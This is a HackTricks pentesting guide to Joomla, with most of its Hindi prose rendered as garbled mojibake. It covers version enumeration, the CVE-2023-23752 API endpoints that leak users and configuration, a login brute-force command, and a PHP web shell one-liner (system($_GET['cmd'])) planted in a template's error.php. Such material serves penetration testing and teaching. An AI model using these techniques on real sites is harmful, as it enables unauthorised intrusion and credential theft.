8.4 KiB
Joomla
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ЁЯТм Discord group or the telegram group or follow us on Twitter ЁЯРж @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Joomla Statistics
Joomla рдХреБрдЫ рдЧреБрдордирд╛рдо рдЙрдкрдпреЛрдЧ рд╕рд╛рдВрдЦреНрдпрд┐рдХреА рдПрдХрддреНрд░ рдХрд░рддрд╛ рд╣реИ рдЬреИрд╕реЗ Joomla, PHP рдФрд░ рдбреЗрдЯрд╛рдмреЗрд╕ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХрд╛ рд╡рд┐рднрд╛рдЬрди рдФрд░ Joomla рдЗрдВрд╕реНрдЯреЙрд▓реЗрд╢рди рдкрд░ рдЙрдкрдпреЛрдЧ рдореЗрдВ рдЖрдиреЗ рд╡рд╛рд▓реЗ рд╕рд░реНрд╡рд░ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдоред рдЗрд╕ рдбреЗрдЯрд╛ рдХреЛ рдЙрдирдХреЗ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ API рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреНрд╡реЗрд░реА рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeration
Discovery/Footprinting
- рдореЗрдЯрд╛ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- In /administrator/manifests/files/joomla.xml рдЖрдк рд╕рдВрд╕реНрдХрд░рдг рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред
- In /language/en-GB/en-GB.xml рдЖрдк Joomla рдХрд╛ рд╕рдВрд╕реНрдХрд░рдг рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
- In plugins/system/cache/cache.xml рдЖрдк рдПрдХ рдЕрдиреБрдорд╛рдирд┐рдд рд╕рдВрд╕реНрдХрд░рдг рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред
Automatic
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Pentesting Web Methodology рдПрдХ рдЕрдиреБрднрд╛рдЧ рд╣реИ рдЬреЛ CMS рд╕реНрдХреИрдирд░реНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╣реИ рдЬреЛ Joomla рдХреЛ рд╕реНрдХреИрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
API рдЕрдирдзрд┐рдХреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдкреНрд░рдХрдЯреАрдХрд░рдг:
рд╕рдВрд╕реНрдХрд░рдг 4.0.0 рд╕реЗ 4.2.7 рдЕрдирдзрд┐рдХреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдкреНрд░рдХрдЯреАрдХрд░рдг (CVE-2023-23752) рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИрдВ рдЬреЛ рдХреНрд░реЗрдбреНрд╕ рдФрд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рдбрдВрдк рдХрд░реЗрдЧрд╛ред
- рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛:
http://<host>/api/v1/users?public=true
- рдХреЙрдиреНрдлрд╝рд┐рдЧ рдлрд╝рд╛рдЗрд▓:
http://<host>/api/index.php/v1/config/application?public=true
MSF рдореЙрдбреНрдпреВрд▓: scanner/http/joomla_api_improper_access_checks
рдпрд╛ рд░реВрдмреА рд╕реНрдХреНрд░рд┐рдкреНрдЯ: 51334
рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕
рдЖрдк рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рд▓реЙрдЧрд┐рди рдХреЛ рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
рдпрджрд┐ рдЖрдк admin credentials рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛ рдЧрдП рд╣реИрдВ, рддреЛ рдЖрдк RCE рдЕрдВрджрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ PHP рдХреЛрдб рдХрд╛ рдПрдХ рд╕реНрдирд┐рдкреЗрдЯ рдЬреЛрдбрд╝рдХрд░ред рд╣рдо рдЗрд╕реЗ template рдХреЛ рдХрд╕реНрдЯрдорд╛рдЗрдЬрд╝ рдХрд░рдХреЗ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
Templates
рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдЬреЛConfiguration
рдХреЗ рддрд╣рдд рдиреАрдЪреЗ рдмрд╛рдИрдВ рдУрд░ рд╣реИ рддрд╛рдХрд┐ рдЯреЗрдореНрдкрд▓реЗрдЯ рдореЗрдиреВ рдЦреБрд▓ рд╕рдХреЗред- рдПрдХ template рдирд╛рдо рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред рдЖрдЗрдП
protostar
рдЪреБрдирддреЗ рд╣реИрдВ рдЬреЛTemplate
рдХреЙрд▓рдо рд╣реЗрдбрд░ рдХреЗ рддрд╣рдд рд╣реИред рдпрд╣ рд╣рдореЗрдВTemplates: Customise
рдкреГрд╖реНрда рдкрд░ рд▓реЗ рдЬрд╛рдПрдЧрд╛ред - рдЕрдВрдд рдореЗрдВ, рдЖрдк рдПрдХ рдкреГрд╖реНрда рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рдкреГрд╖реНрда рд╕реНрд░реЛрдд рдЦреБрд▓ рд╕рдХреЗред рдЖрдЗрдП
error.php
рдкреГрд╖реНрда рдЪреБрдирддреЗ рд╣реИрдВред рд╣рдо рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ PHP one-liner рдЬреЛрдбрд╝реЗрдВрдЧреЗ рдЬреИрд╕рд╛ рдХрд┐ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╣реИ: system($_GET['cmd']);
- Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
- JoomSploit: Joomla рд╢реЛрд╖рдг рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЬреЛ XSS рдХреЛ RCE рдпрд╛ рдЕрдиреНрдп рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдореЗрдВ рдмрдврд╝рд╛рддреА рд╣реИред рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдЗрд╕ рдкреЛрд╕реНрдЯ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред рдпрд╣ Joomla рд╕рдВрд╕реНрдХрд░рдг 5.X.X, 4.X.X, рдФрд░ 3.X.X рдХреЗ рд▓рд┐рдП рд╕рдорд░реНрдерди рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ:
- Privilege Escalation: Joomla рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдмрдирд╛рддрд╛ рд╣реИред
- (RCE) Built-In Templates Edit: Joomla рдореЗрдВ рдПрдХ Built-In Templates рдХреЛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИред
- (Custom) Custom Exploits: рддреГрддреАрдп-рдкрдХреНрд╖ Joomla рдкреНрд▓рдЧрдЗрдиреНрд╕ рдХреЗ рд▓рд┐рдП рдХрд╕реНрдЯрдо рд╢реЛрд╖рдгред
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ЁЯТм Discord group or the telegram group or follow us on Twitter ЁЯРж @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.